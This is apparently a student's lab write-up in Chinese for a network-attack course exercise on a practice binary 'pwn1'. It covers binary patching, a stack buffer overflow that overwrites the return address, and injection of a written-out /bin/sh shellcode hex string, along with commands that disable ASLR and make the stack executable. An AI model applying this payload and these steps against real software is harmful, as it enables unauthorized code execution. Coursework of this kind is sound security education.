码迷,mamicode.com
首页 > 其他好文 > 详细

2017-2018-2 20155333 《网络对抗技术》 Exp1 PC平台逆向破解

时间:2018-03-19 00:35:18      阅读:366      评论:0      收藏:0      [点我收藏+]

标签:基本   执行   跳转   esc   sci   vdso   占用   反汇编   提示   

2017-2018-2 20155333 《网络对抗技术》 Exp1 PC平台逆向破解

1、 逆向及Bof基础实践说明

1.1 实践目标

  • 本次实践的对象是一个名为pwn1的linux可执行文件。

  • 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。

  • 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。

1.2 实践内容

  • 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
  • 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
  • 注入一个自己制作的shellcode并运行这段shellcode。

1.3 实践思路

  • 运行原本不可访问的代码片段
  • 强行修改程序执行流
  • 以及注入运行任意代码

2、 基础知识

2.1 要求

  • 熟悉Linux基本操作
    • 能看懂常用指令,如管道(|),输入、输出重定向(>)等。
  • 理解Bof的原理。
    • 能看得懂汇编、机器指令、EIP、指令地址。
  • 会使用gdb,vi。

  • 指令、参数
    • 一些具体的问题可以边做边查,但最重要的思路、想法不能乱。
    • 要时刻知道,我是在做什么?现在在查什么数据?改什么数据?要改成什么样?每步操作都要单独实践验证,再一步步累加为最终结果。
  • 操作成功不重要,照着敲入指令肯定会成功。
  • 重要的是理解思路。
    • 看指导理解思路,然后抛开指导自己做。
    • 碰到问题才能学到知识。
    • 具体的指令可以回到指导中查。

2.2 常用的Linux基本操作

  • objdump -d:从objfile中反汇编那些特定指令机器码的section。
  • perl -e:后面紧跟单引号括起来的字符串,表示在命令行要执行的命令。
  • xxd:为给定的标准输入或者文件做一次十六进制的输出,它也可以将十六进制输出转换为原来的二进制格式。
  • ps -ef:显示所有进程,并显示每个进程的UID,PPIP,C与STIME栏位。
  • |:管道,将前者的输出作为后者的输入。
  • >:输入输出重定向符,将前者输出的内容输入到后者中。

2.3 常用汇编指令

  • objdump -d XX:反汇编
  • :%!xxd:进入十六进制编辑模式
  • /:查询
  • db XXX:调试
  • %!xxd -r:切回原模式

实践

实践一 直接修改程序机器指令,改变程序执行流程

  • 下载目标文件pwn1,反汇编。

技术分享图片

  • getShell和foo地址相差(91-7d)=0x21,因此欲call 8048491
  • 修改过程:
    • vi打开编辑文件(此时为二进制格式);
    • 按ESC键,输入:%!xxd将文件转换为十六进制编辑模式;
    • 输入/e8 d7找到修改位置,i进入编辑模式修改d7为c3;
    • 输入:%!xxd -r转回二进制模式;
    • 输入:wq保存退出。
      技术分享图片
  • 再次进行反汇编的结果如下:

技术分享图片

  • 运行修改后的代码,可以得到shell提示符:

技术分享图片

实践二 通过构造输入参数,造成BOF攻击,改变程序执行流

  • 反汇编,了解程序的基本功能
  • 确认输入字符串哪几个字符会覆盖到返回地址

技术分享图片

技术分享图片

- 分别输入1111111132222222333333334444444455555555和1111111132222222333333334444444412345678看eip寄存器的值,对比可知占用返回地址的压栈数据为4321
  • 将这些数换成getshell的内存地址(\x7d\x84\x04\x08\x0a),通过perl生成在ASCII界面所无法输入的16进制值,用(cat input; cat) | ./xxx来进入程序,运行结果如下:

技术分享图片

实践三 注入Shellcode并执行

  • 准备工作:若堆栈内存区设置为不可执行。这样即使是注入的shellcode到堆栈上,也执行不了。使用execstack -s XXX设置堆栈可执行,通过execstack -q XXX查看堆栈是否可执行。使用more /proc/sys/kernel/randomize_va_space命令查看是否开启地址随机化(让OS每次都用不同的地址加载应用),有以下三种情况
  • 0表示关闭进程地址空间随机化。
  • 1表示将mmap的基址,stack和vdso页面随机化。
  • 2表示在1的基础上增加栈(heap)的随机化。
  • 使用echo "0" > /proc/sys/kernel/randomize_va_space命令关闭进程地址空间随机化,并再次使用more /proc/sys/kernel/randomize_va_space验证。

  • Linux下有两种基本构造攻击buf的方法:
  • retaddr+nop+shellcode
  • nop+shellcode+retaddr(nop一为是了填充,二是作为“着陆区/滑行区”,若猜的返回地址只要落在任何一个nop上,自然会滑到我们的shellcode)。
  • 因为retaddr在缓冲区的位置是固定的,shellcode要不在它前面,要不在它后面。
  • 简单说缓冲区小就把shellcode放后边,缓冲区大就把shellcode放前边

  • 构造一个shellcode,输入攻击命令(cat input_shellcode;cat) | ./XXX,并找到pwn1的进程号
  • 进行gdb调试,通过设置断点,来查看注入buf的内存地址
  • 结构为:anything+retaddr+nops+shellcode。看到01020304了,就是返回地址的位置。shellcode就挨着,所以地址是 0xffffd280

技术分享图片

技术分享图片

技术分享图片

  • 修改input_shellcode为\x80\xd2\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x60\xd2\xff\xff\x00,如图所示,再次攻击后成功!

技术分享图片

问题与总结

问题:什么是漏洞?漏洞有什么危害?

漏洞就是正常功能的硬件、软件或者策略中的缺陷。黑客利用漏洞来破坏计算机安全,达到其他对正常使用者不利的目的。

实验收获与感想

参考老师的指导教程完成了本次实验,实验过程中不仅有复习到之前学过的Linux和汇编的相关知识,还学习了网络对抗的一些基本知识,算得上是小有收获了。

2017-2018-2 20155333 《网络对抗技术》 Exp1 PC平台逆向破解

标签:基本   执行   跳转   esc   sci   vdso   占用   反汇编   提示   

原文地址:https://www.cnblogs.com/rh123456/p/8598227.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!